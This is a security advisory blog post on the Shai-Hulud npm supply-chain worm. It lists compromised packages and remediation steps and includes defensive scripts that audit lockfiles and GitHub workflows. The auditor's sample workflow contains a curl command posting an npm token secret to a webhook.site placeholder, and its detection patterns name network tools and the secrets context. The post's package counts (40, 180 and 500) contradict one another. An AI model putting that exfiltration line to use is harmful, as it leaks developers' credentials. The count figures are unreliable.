
Self-replicating Worm hits 180+ npm packages to steal credentials in latest supply chain attack

Written by Integrity360 | Sep 18, 2025 9:11:55 AM

Cyber security researchers have flagged a fresh software supply chain attack targeting the npm registry (one of the world's largest software registries and the package manager for Node.js projects) that has affected more than 40 packages belonging to multiple maintainers.

"The compromised versions include a function (NpmModule.updatePackage) that downloads a package tarball, modifies package.json, injects a local script (bundle.js), repacks the archive, and republishes it, enabling automatic trojanization of downstream packages," supply chain security company Socket said. 

The end goal of the campaign is to search developer machines for secrets using TruffleHog's credential scanner and transmit them to an external server under the attacker's control. The attack is capable of targeting both Windows and Linux systems. 


More Than 500 Packages Impacted 

A cluster of malicious npm packages contains a trojanized bundle.js that runs TruffleHog to scan hosts for secrets (e.g., GITHUB_TOKEN, NPM_TOKEN, AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY). The script validates the tokens it finds (npm whoami, GitHub APIs), probes cloud metadata endpoints for short-lived credentials on build agents, and then abuses the discovered developer credentials to commit a GitHub Actions workflow into .github/workflows that exfiltrates harvested secrets to a webhook.site endpoint. Because the workflow is committed to the repository, the exfiltration capability persists and can be triggered by future CI runs in which secrets are available.
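The committed workflow is what makes the compromise persist, so repositories need to be checked for it. The script below is an added example (not from the advisory or any vendor tool) of a heuristic audit of workflow files: it reads workflow YAML as text, splits it into steps, and flags any step referencing the webhook.site domain named above, or any step that both references the `secrets` context and invokes a network tool; the second rule is an assumed heuristic that will need tuning per repository.

```javascript
// Added example, not code from the advisory or any vendor tool: a heuristic scan of
// GitHub Actions workflow text for the exfiltration pattern described above. The only
// indicator taken from the advisory is the webhook.site domain; the "secrets context
// plus a network tool in the same step" rule is a defensive heuristic needing tuning.
const EXFIL_DOMAIN = /webhook\.site/i;
const NET_TOOL = /\b(curl|wget|Invoke-WebRequest|fetch\()/i;
const SECRETS_CTX = /\$\{\{\s*secrets\./i;
const STEP_START = /^\s*-\s+(name|uses|run|id|env|with|shell|if):/;

// Split workflow text into steps; a step starts at a "- name:" / "- uses:" / "- run:" line.
function splitSteps(yamlText) {
  const steps = [];
  yamlText.split(/\r?\n/).forEach((line, idx) => {
    if (STEP_START.test(line) || steps.length === 0) steps.push({ startLine: idx + 1, lines: [] });
    steps[steps.length - 1].lines.push(line);
  });
  return steps;
}

// One finding per step per matched rule, with the step's starting line for triage.
function auditWorkflow(fileName, yamlText) {
  const findings = [];
  for (const step of splitSteps(yamlText)) {
    const text = step.lines.join('\n');
    const where = `${fileName}:${step.startLine}`;
    if (EXFIL_DOMAIN.test(text)) findings.push({ where, rule: 'known-exfil-domain' });
    if (NET_TOOL.test(text) && SECRETS_CTX.test(text)) findings.push({ where, rule: 'secrets-passed-to-network-tool' });
  }
  return findings;
}

// Constructed sample resembling an injected workflow; the URL is a placeholder, not a real endpoint.
const SAMPLE_WORKFLOW = `name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: upload
        env:
          DATA: \${{ secrets.NPM_TOKEN }}
        run: curl -X POST -d "$DATA" https://webhook.site/PLACEHOLDER-ID
`;

console.log(auditWorkflow('.github/workflows/ci.yml', SAMPLE_WORKFLOW));
```

Run it over every file under .github/workflows on each branch, and compare against git history to see when a flagged file was introduced and by which account.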


Security vendors describe the malware — dubbed Shai-Hulud — as a self-propagating worm: compromised npm maintainer accounts are used to publish new malicious package versions that in turn infect downstream packages and repositories, creating cascading compromises across the npm ecosystem. The campaign’s suspected starting point is a malicious rxnt-authentication package published on 2025-09-14; the npm account techsupportrxnt is considered “Patient Zero.” Analysts found 34 compromised GitHub accounts containing a Shai-Hulud repo with a data.json holding encoded exfiltrated items, and an analysis identified 278 leaked secrets (90 from local systems, 188 via malicious workflows), with hundreds of npm packages impacted. 


This attack is notable for combining credential harvesting, persistent CI-side exfiltration, and automatic propagation via maintainers’ publishing rights. Recommended immediate actions are to remove the malicious package versions, rotate all exposed tokens/keys, audit CI workflows and repository history for unauthorized .github/workflows commits, inspect maintainers’ accounts for compromise, and upgrade to verified clean releases. 

Affected Packages: 

The following packages have been identified as impacted by the incident:

  • @ctrl/deluge@7.2.2
  • @ctrl/golang-template@1.4.3
  • @ctrl/magnet-link@4.0.4
  • @ctrl/ngx-codemirror@7.0.2
  • @ctrl/ngx-csv@6.0.2
  • @ctrl/ngx-emoji-mart@9.2.2
  • @ctrl/ngx-rightclick@4.0.2
  • @ctrl/qbittorrent@9.7.2
  • @ctrl/react-adsense@2.0.2
  • @ctrl/shared-torrent@6.3.2
  • @ctrl/tinycolor@4.1.1, 4.1.2
  • @ctrl/torrent-file@4.1.2
  • @ctrl/transmission@7.3.1
  • @ctrl/ts-base32@4.0.2
  • encounter-playground@0.0.5
  • json-rules-engine-simplified@0.2.4, 0.2.1
  • koa2-swagger-ui@5.11.2, 5.11.1
  • @nativescript-community/gesturehandler@2.0.35
  • @nativescript-community/sentry@4.6.43
  • @nativescript-community/text@1.6.13
  • @nativescript-community/ui-collectionview@6.0.6
  • @nativescript-community/ui-drawer@0.1.30
  • @nativescript-community/ui-image@4.5.6
  • @nativescript-community/ui-material-bottomsheet@7.2.72
  • @nativescript-community/ui-material-core@7.2.76
  • @nativescript-community/ui-material-core-tabs@7.2.76
  • ngx-color@10.0.2
  • ngx-toastr@19.0.2
  • ngx-trend@8.0.1
  • react-complaint-image@0.0.35
  • react-jsonschema-form-conditionals@0.3.21
  • react-jsonschema-form-extras@1.0.4
  • rxnt-authentication@0.0.6
  • rxnt-healthchecks-nestjs@1.0.5
  • rxnt-kue@1.0.7
  • swc-plugin-component-annotate@1.9.2
  • ts-gaussian@3.0.6
  • @crowdstrike/commitlint@8.1.1, 8.1.2
  • @crowdstrike/falcon-shoelace@0.4.2
  • @crowdstrike/foundry-js@0.19.2
  • @crowdstrike/glide-core@0.34.2, 0.34.3
  • @crowdstrike/logscale-dashboard@1.205.2
  • @crowdstrike/logscale-file-editor@1.205.2
  • @crowdstrike/logscale-parser-edit@1.205.1, 1.205.2
  • @crowdstrike/logscale-search@1.205.2
  • @crowdstrike/tailwind-toucan-base@5.0.2
  • browser-webdriver-downloader@3.0.8
  • ember-browser-services@5.0.3
  • ember-headless-form-yup@1.0.1
  • ember-headless-form@1.1.3
  • ember-headless-table@2.1.6
  • ember-url-hash-polyfill@1.0.13
  • ember-velcro@2.2.2
  • eslint-config-crowdstrike-node@4.0.4
  • eslint-config-crowdstrike@11.0.3
  • monorepo-next@13.0.2
  • remark-preset-lint-crowdstrike@4.0.2
  • verror-extra@6.0.1
  • yargs-help-output@5.0.3


What You Should Do 

As minimum containment measures, you should:

  • Remove or downgrade the affected versions and rebuild from a clean cache/artifact source.
  • Rotate, revoke and replace all credentials used on any affected machine or CI runner (npm tokens, GitHub PATs/Actions secrets, cloud keys).
  • Audit logs for signs of suspicious installs, unauthorized publishes or automatically committed workflow files.
  • Check GitHub for a new repo named “Shai-Hulud”. This campaign creates a public repo under victims’ accounts to dump stolen data. If found, remove it and review its contents and history to understand the scope of the leak.
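For the first step, the affected versions have to be located in each project's lockfile, including copies nested under other dependencies. The following Node.js script is an added example (not the advisory's own tooling) that checks a package-lock.json against the list above; the AFFECTED map is deliberately only a subset of that list and must be extended with the remaining entries before use.

```javascript
// Added example, not code from the advisory: audit an npm package-lock.json for the
// package versions listed above. AFFECTED holds a subset of that list for brevity;
// extend it with the remaining entries before running against a real project.
const AFFECTED = {
  '@ctrl/tinycolor': ['4.1.1', '4.1.2'],
  '@ctrl/deluge': ['7.2.2'],
  'ngx-toastr': ['19.0.2'],
  'rxnt-authentication': ['0.0.6'],
};
// lockfileVersion 2/3 keys are install paths such as "node_modules/a/node_modules/@scope/b";
// the package name is whatever follows the last "node_modules/".
function packageNameFromKey(key) {
  const idx = key.lastIndexOf('node_modules/');
  return idx === -1 ? null : key.slice(idx + 'node_modules/'.length);
}
// lockfileVersion 1 nests "dependencies" recursively instead of using a flat map.
function walkV1(deps, prefix, affected, hits) {
  for (const [name, entry] of Object.entries(deps || {})) {
    const path = `${prefix}node_modules/${name}`;
    if ((affected[name] || []).includes(entry.version)) hits.push({ path, name, version: entry.version });
    walkV1(entry.dependencies, `${path}/`, affected, hits);
  }
}
// Returns every installed copy of an affected version together with its install path.
function findCompromised(lockfile, affected = AFFECTED) {
  const hits = [];
  if (lockfile.packages) {
    for (const [key, entry] of Object.entries(lockfile.packages)) {
      const name = packageNameFromKey(key);
      if (name && (affected[name] || []).includes(entry.version)) {
        hits.push({ path: key, name, version: entry.version });
      }
    }
  } else {
    walkV1(lockfile.dependencies, '', affected, hits);
  }
  return hits;
}
// Constructed sample lockfile (v3) for demonstration; not a real project.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/@ctrl/tinycolor': { version: '4.1.2' },
    'node_modules/ngx-toastr': { version: '19.0.1' },
    'node_modules/foo/node_modules/rxnt-authentication': { version: '0.0.6' },
  },
};
console.log(findCompromised(SAMPLE_LOCK));
```

Against a real project, pass `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` instead of the sample, and treat any hit as grounds for the credential rotation and workflow audit steps above, not just a version bump.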

Overall, however, affected machines should be considered fully compromised, so a full reinstall or reimage is preferred.
